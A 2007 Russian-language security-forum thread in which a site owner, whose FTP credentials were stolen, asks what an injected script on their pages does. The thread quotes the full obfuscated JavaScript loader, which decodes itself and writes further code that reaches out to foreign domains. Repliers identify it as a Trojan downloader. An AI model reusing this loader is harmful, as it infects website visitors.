-
Junior Member
- Вес репутации
- 60
Неизвестный код на сайте после кражи FTP-паролей
Здравствуйте, уважаемые эксперты.
Подскажите, что это может быть? Вставилось на все главные страницы сайтов, расположенных на одной хостинг-площадке, логин и пароль от которой был сохранен в FTP-клиенте.
Код:
</body>
</html>
<!-- ~ --><script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&41&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&44&43&3d&42&42&46&3d&42&42&45&3d&4:&4:&3d&47&42&3d&44&45&3d&42&41&45&3d&42&42&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d&45&48&3d&4:&49&3d&42&41&49&3d&45&49&3d&4:&4:&3d&42&41&48&3d&42&41&42&3d&42&42&45&3d&45&47&3d&42&41&46&3d&42&42&41&3d&42&41&43&3d&42&42&42&3d&45&48&3d&42&41&46&3d&42&42&41&3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&44&45&3d&44&43&3d&44&43&3d&42&42&4:&3d&42&41&46&3d&42&41&41&3d&42&42&47&3d&42&41&45&3d&47&42&3d&45&4:&3d&44&43&3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d&42&41&45&3d&42&42&47&3d&47&42&3d&45&4:&3d&44&43&3d&42&42&46&3d&42&42&47&3d&42&43&42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&45&3d&42&41&41&3d&42&41&46&3d&42&42&46&3d&42&42&43&3d&42&41&49&3d&4:&48&3d&42&43&42&3d&46&49&3d&42&42&41&3d&42&42&42&3d&42&42&41&3d&42&41&42&3d&44&45&3d&47&43&3d&47&41&3d&45&48&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&47&43&3d&42&44&3d&42&41&3d&47&41&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&44&43&3d&42&42&46&3d&42&42&45&3d&4:&4:&3d&47&42&3d&44&45&3d&42&41&45&3d&42&42&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d&45&48&3d&42&42&47&3d&4:&48&3d&42&41&48&3d&42&41&42&3d&42&42&41&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&42&42&46&3d&45&47&3d&4:&4:&3d&42&42&41&3d&45&48&3d&42&41&46&3d&42&42&41&3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&44&45&3d&44&43&3d&44&43&3d&42&42&4:&3d&42&41&46&3d&42&41&41&3d&42&42&47&3d&42&41&45&3d&47&42&3d&45&4:&3d&44&43&3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d&42&41&45&3d&42&42&47&3d&47&42&3d&45&4:&3d&44&43&3d&42&42&46&3d&42&42&47&3d&42&43&42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&45&3d&42&41&41&3d&42&41&46&3d&42&42&46&3d&42&42&43&3d&42&41&49&3d&4:&48&3d&42&43&42&3d&46&49&3d&42&42&41&3d&42&42&42&3d&42&42&41&3d&42&41&42&3d&44&45&3d&47&43&3d&47&41&3d&45&48&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&47&43&3d&42&44&3d&42&41&3:&3:&4c&4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script><!-- ~ -->
Обнаружил случайно, в статус баре браузера какие-то китайские домены появились при загрузке страницы (worldstat.cn и др.).
Что это за код, что он делает, в чем его вред?
Заранее спасибо.
Последний раз редактировалось Макcим; 04.11.2007 в 10:40.
Причина: Вставил тег [CODE]
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Я не экспер. Могу сказать только то, что это защифрованный скрипт. Такие обычно запускают какой-нибудь Trojan.Downloader, который может скачать запустить все что угодно.
Советую сделать все по Правилам на компьютере с которого похитили пароль.
-
-
Присоединюсь к AndreyKa. Вам лучше выполнить правила, так как, скорее всего, ваш ПК заражен.
-